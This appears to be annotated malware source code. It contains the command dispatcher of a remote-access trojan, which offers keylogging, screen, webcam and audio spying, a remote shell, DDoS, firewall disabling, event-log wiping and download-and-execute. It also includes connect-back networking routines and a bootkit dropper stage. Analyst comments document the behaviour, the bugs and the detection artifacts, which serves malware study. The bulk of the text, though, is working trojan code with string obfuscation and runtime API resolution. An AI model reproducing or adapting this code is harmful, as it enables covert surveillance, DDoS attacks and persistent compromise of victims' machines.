// ManageNewConnection: registers an accepted connection in the global
// Connections[] table and starts a worker thread for it.  Annotated for
// analysis; the code itself is left as found.
//
// What the code shows (everything happens while holding hThreadMutex, taken
// with an INFINITE wait and released on every path out of the function):
//   - If dwConnections < MAX_CONN, slot Connections[dwConnections] receives
//     the socket, peer ip/port, uCid, and a fresh bid ((USHORT)dwBid + 1);
//     thread_s is first set to INVALID_SOCKET.
//   - NetConnect() is then called with the dotted-quad form of uIP and uPort
//     and its result stored in thread_s.  The result is NOT checked, so a
//     failed outbound connect still gets a ConnectionThread.  Reviewer note:
//     connecting back to the peer's own address looks like a relay/connect-back
//     scheme — confirm against NetConnect and ConnectionThread.
//   - dwBid and dwConnections are incremented, then pCreateThread() starts
//     ConnectionThread with the bid passed through the LPVOID parameter (an
//     integer cast to void*, not a pointer).  The thread handle is stored in
//     the slot; pCreateThread's return value is not checked either.
//   - When the table is full the connection is silently dropped; Socket is not
//     closed here (whether the caller closes it is not visible in this file).
// All Win32/Winsock calls go through p*-prefixed function pointers rather than
// the import table; elsewhere in this file such pointers are filled via
// GetProcAddress(LoadLibrary(...)), i.e. runtime API resolution.
void ManageNewConnection( SOCKET Socket, ULONG uIP, USHORT uCid, USHORT uPort) { pWaitForSingleObject( hThreadMutex, INFINITE ); if ( dwConnections < MAX_CONN ) { Connections[ dwConnections ].thread_s = INVALID_SOCKET; Connections[ dwConnections ].s = Socket; Connections[ dwConnections ].ip = uIP; Connections[ dwConnections ].port = uPort; Connections[ dwConnections ].cid = uCid; Connections[ dwConnections ].bid = (USHORT)dwBid + 1; in_addr in; in.S_un.S_addr = uIP; Connections[ dwConnections ].thread_s = NetConnect( (char*)pinet_ntoa( in ), uPort ); dwBid++; DWORD ThreadId = 0; dwConnections++; Connections[ dwConnections - 1 ].hThread = pCreateThread( NULL, 0, ConnectionThread, (void*)Connections[ dwConnections - 1 ].bid, 0, &ThreadId ); } pReleaseMutex( hThreadMutex ); }
// MyConnect: TCP connect to Host:Port with a 10 s per-attempt timeout and up
// to three attempts.  Returns the connected SOCKET, or -1 (INVALID_SOCKET on
// Windows) on failure.  Annotated for analysis; the code is left as found.
//
// Flow: pgethostbyname(Host) -> first entry of h_addr_list -> sockaddr_in with
// htons(Port).  Each attempt creates a socket, runs ConnectThread(&connData)
// on its own thread, waits up to 10 s, and returns the socket when the thread
// finished with exit code 0 (ConnectThread's success convention — inferred
// from the check below, confirm in ConnectThread).
//
// Review notes (defects are documented, not fixed):
//   - A failed attempt shuts the socket down (pshutdown) but never closes it,
//     and the thread handle returned by pCreateThread is never closed: one
//     socket and one handle leak per failed attempt.  The pshutdown error
//     branch is empty.
//   - pTerminateThread on a thread that may be blocked inside connect() is the
//     documented last-resort API: the victim thread's stack and any locks it
//     holds are not released.
//   - connData is a stack object shared by all three iterations and handed to
//     each thread by pointer.  If pCreateThread fails (NULL handle) the wait
//     and pGetExitCodeThread both fail and the loop simply retries.
//   - Only the first resolved address is ever tried; a multi-homed host with a
//     bad first entry never connects.
//   - The commented-out wsprintfA/OutputDebugStringA pair below references a
//     `str` buffer that is not declared in this function (leftover debug code).
SOCKET MyConnect( char *Host, int Port ) { LPHOSTENT lpHost = (LPHOSTENT)pgethostbyname( (const char*)Host ); if ( lpHost == NULL ) { return -1; } sockaddr_in SockAddr; SockAddr.sin_family = AF_INET; SockAddr.sin_addr.s_addr = **(unsigned long**)lpHost->h_addr_list; SockAddr.sin_port = (USHORT)phtons( (unsigned short)Port ); ConnectionData connData; connData.SockAddr = SockAddr; for(int i=0; i<3; i++) { SOCKET Socket = (SOCKET)psocket( AF_INET, SOCK_STREAM, 0 ); if( Socket == -1 ) return -1; connData.Socket = Socket; HANDLE ConnectThreadHandle = (HANDLE)pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ConnectThread, &connData, NULL, 0); if((long)pWaitForSingleObject(ConnectThreadHandle, 10000) == WAIT_TIMEOUT) { if((int)pshutdown(Socket, 2) == SOCKET_ERROR) { } pTerminateThread(ConnectThreadHandle, 1); } DWORD exitCode = 0; BOOL res = (BOOL)pGetExitCodeThread(ConnectThreadHandle, &exitCode); /* wsprintfA(&str[0], "EC:%d", exitCode); */ /* OutputDebugStringA(&str[0]); */ if(res && exitCode == 0) return Socket; } return -1; }
// CKernelManager::OnReceive: command dispatcher of a remote-access trojan.
// lpBuffer[0] is the command byte, lpBuffer + 1 its payload, nSize the packet
// length.  The case labels document the capability set themselves: file
// manager, screen/webcam/audio capture, remote shell, keylogger,
// process/service/registry management, DDoS start/stop, adding a user, proxy,
// RDP (3389) enablement, guest-account enablement, firewall disable, message
// box, download-and-execute, URL open (visible/hidden), self-uninstall,
// event-log clearing, session shutdown, remark/group rename, self-update,
// heartbeat reply, and process/window presence checks.  Annotated for
// analysis only; the code is left as found (original Chinese comments are
// translated in place).
//
// What the code shows:
//   - InterlockedExchange, Sleep, CreateThread, CloseHandle and EnumWindows are
//     resolved at runtime via GetProcAddress(LoadLibrary(...)).  The
//     "CloseHandle" name is assembled from a char array (DDZGlGm) — light
//     string obfuscation against static string scanning.
//   - Most commands spawn a worker via MyCreateThread and store the handle in
//     m_hThread[m_nThreadCount++] with no bound check visible.  The array size
//     is not in this file, so repeated commands may overrun it — TODO confirm.
//   - Several workers (NETUSER, OpenProxy, ChangePort, Loop_DownManager,
//     Loop_MsgBox) receive lpBuffer + 1 directly, a pointer into the receive
//     buffer owned by the caller.  The pSleep(500)/pSleep(100) calls — the
//     original comment reads "for passing the parameters" — are a timing-based
//     workaround for that lifetime race, not synchronisation.
//   - COMMAND_DDOS_ATTACK memcpy's sizeof(ATTACK) bytes from lpBuffer + 1
//     without comparing against nSize (over-read on a short packet); the
//     DDOSManager object is a block-scoped local that is destroyed at `}`.
//   - COMMAND_SORT_WINDOW does an unbounded strcpy into temp_proc (size not
//     visible here).  The surrounding catch(...) presumably will not catch an
//     access violation under the default MSVC synchronous EH model.
//   - COMMAND_OPEN_3389 passes nSize - 2 as the payload length; COMMAND_SESSION
//     hands lpBuffer[1] to CSystemManager::ShutdownWindows; COMMAND_DDOS_STOP
//     sets Stoping = FALSE (the name suggests the inverse — confirm in
//     DDOSManager); COMMAND_UPDATE_SERVER uninstalls the service only when
//     UpdateServer() reports success.
//   - No authentication or integrity check of the command source is visible in
//     this function; whatever exists must live in m_pClient or the caller.
/* activation added */ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize) { typedef LONG (WINAPI *InterlockedExchangeT) ( __inout LONG volatile *Target, __in LONG Value ); InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange"); typedef VOID (WINAPI *SleepT) ( __in DWORD dwMilliseconds ); SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep"); typedef HANDLE (WINAPI *CreateThreadT)( __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in_opt LPVOID lpParameter, __in DWORD dwCreationFlags, __out_opt LPDWORD lpThreadId ); CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread"); typedef BOOL (WINAPI *CloseHandleT) ( __in HANDLE hObject ); char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm); typedef BOOL (WINAPI *EnumWindowsT)( __in WNDENUMPROC lpEnumFunc, __in LPARAM lParam); EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows"); switch (lpBuffer[0]) { case COMMAND_ACTIVED: pInterlockedExchange((LONG *)&m_bIsActived, true); break; case COMMAND_LIST_DRIVE: /* file management */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, false); break; case COMMAND_SCREEN_SPY: /* screen viewing */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_WEBCAM: /* webcam */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_AUDIO: /* audio eavesdropping */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager, (LPVOID)m_pClient->m_Socket, 0, 
NULL); break; case COMMAND_SHELL: /* remote shell */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_KEYBOARD: /* keylogger */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSTEM: /* system management, including processes and windows */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SERMANAGER: /* service management */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_DDOS_ATTACK: { ATTACK m_Attack; memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK)); DDOSManager m_DDOSManager(&m_Attack); } break; case COMMAND_DDOS_STOP: Stoping = FALSE; break; case COMMAND_REGEDIT: /* registry management */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSINFO: m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_NET_USER: /* add a user without NET */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_PROXY: /* open proxy */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_3389: { Open3389((LPCTSTR)(lpBuffer + 1), nSize -2); } break; case COMMAND_GUEST: /* enable the GUEST account */ OpenGuest(); break; case COMMAND_STOPFIRE: /* turn off the firewall */ StopFire(); break; case COMMAND_CHANGE_PORT: /* change terminal (port) */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_SENDMSG: { 
pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL)); pSleep(500); } break; case COMMAND_DOWN_EXEC: /* downloader */ m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager, (LPVOID)(lpBuffer + 1), 0, NULL, true); pSleep(100); /* for passing the parameters */ break; case COMMAND_OPEN_URL_SHOW: /* open a web page visibly */ OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL); break; case COMMAND_OPEN_URL_HIDE: /* open a web page hidden */ OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE); break; case COMMAND_REMOVE: /* uninstall */ UnInstallService(); break; case COMMAND_CLEAN_EVENT: /* clear event logs */ CleanEvent(); break; case COMMAND_SESSION: /* session management */ CSystemManager::ShutdownWindows(lpBuffer[1]); break; case COMMAND_RENAME_REMARK: /* change remark */ SetHostID((LPCTSTR)(lpBuffer + 1)); break; case COMMAND_CHANGE_GROUP: /* change group */ SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS"); break; case COMMAND_UPDATE_SERVER: /* update the server (implant) */ if (UpdateServer((char *)lpBuffer + 1)) UnInstallService(); break; case COMMAND_REPLAY_HEARTBEAT: /* reply to heartbeat packet */ break; case COMMAND_SORT_PROCESS: /* process filter */ try { if (isProcesin((LPTSTR)(lpBuffer + 1))) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; case COMMAND_SORT_WINDOW: /* window filter */ try { strcpy(temp_proc,(LPTSTR)(lpBuffer + 1)); pEnumWindows(EnumWindowsList,0); if (proc_tag) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); proc_tag = false; }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; } }
// ExplorerMain: bootkit-dropper stage that runs inside Explorer.  Per the
// original Russian header comment (translated below): after its checks it
// fires the Explorer "start" event, which in turn triggers installation of
// BkDll.  Annotated for analysis only; the code is left as found.
//
// What the code shows:
//   - If PathBkFile does not exist (pGetFileAttributesA returns
//     INVALID_FILE_ATTRIBUTES), ExplorerStart(NULL) is run.  On success ret
//     and BkInstalledSuccess are set and the 4-byte value of ret (1, matching
//     the "Saving 0x00000001" log line) is written to PathBkFile as an
//     "installed" marker.  If the marker already exists the install is treated
//     as done (ret = TRUE) without re-running it.
//   - When ret is TRUE a second file is created: Path is the system directory
//     truncated to its first 3 chars (the drive root, e.g. "C:\") with
//     STR::GetRightStr(UID, "0") of GenerateUid() appended.  The original
//     comment says this file is polled by the ring3 bot that launched the
//     dropper, which then tries to remove itself from autorun — a file-based
//     IPC channel between dropper and bot.  Note that what gets written is
//     &Path, i.e. the address of the local pointer variable (sizeof(PCHAR)
//     bytes), so the "4 bytes of the string address" in the comment only holds
//     on 32-bit builds; presumably only the file's existence matters (confirm
//     in the bot).
//   - On a fresh install RebootThread and RebootNotifyThread are started; the
//     handles returned by pCreateThread are discarded (never closed or joined)
//     and thid is overwritten by the second call.
//   - The STR::Alloc buffers are freed on the ret path; there is no failure
//     check on STR::Alloc, pGetSystemDirectoryA, or either WriteBufferA call.
// Detection-relevant artifacts: the PathBkFile marker, and a file at the
// system drive root whose name derives from the generated UID.
/* Function which, after its checks, fires the start events in the Explorer process, which in turn triggers the BkDll installation. */ BOOL ExplorerMain() { BOOL ret = FALSE; bool BkInstalledSuccess = false; PP_DPRINTF(L"ExplorerMain: started"); /* fire the Explorer start event */ if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) { PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()"); if ( ExplorerStart(NULL) ) { ret = TRUE; BkInstalledSuccess = true; PP_DPRINTF(L"ExplorerMain: ExplorerStart() finished successfuly. Saving 0x00000001 in '%S'", PathBkFile); /* write 4 bytes holding a one into BkFile */ File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL)); } } else { PP_DPRINTF(L"ExplorerMain: BkFile exists."); ret = TRUE; }; if ( ret ) { /* If the check finds the Bk file, or the install returned success, a file is created in the system root holding 4 bytes of the string's address. That file is checked by the ring3 bot that launched the bootkit dropper; on finding it the bot will try to remove itself from autorun. */ PCHAR Path= STR::Alloc(MAX_PATH); PCHAR UID=STR::Alloc(120); pGetSystemDirectoryA(Path,MAX_PATH); GenerateUid(UID); Path[3]='\0'; PCHAR Pref= STR::GetRightStr(UID,"0"); m_lstrcat(Path, Pref); PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path); File::WriteBufferA(Path,&Path,sizeof(PCHAR)); STR::Free(Pref); STR::Free(UID); STR::Free(Path); }; if (BkInstalledSuccess) { DWORD thid = 0; PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread"); pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid); pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid); } PP_DPRINTF(L"ExplorerMain: finished."); return ret; }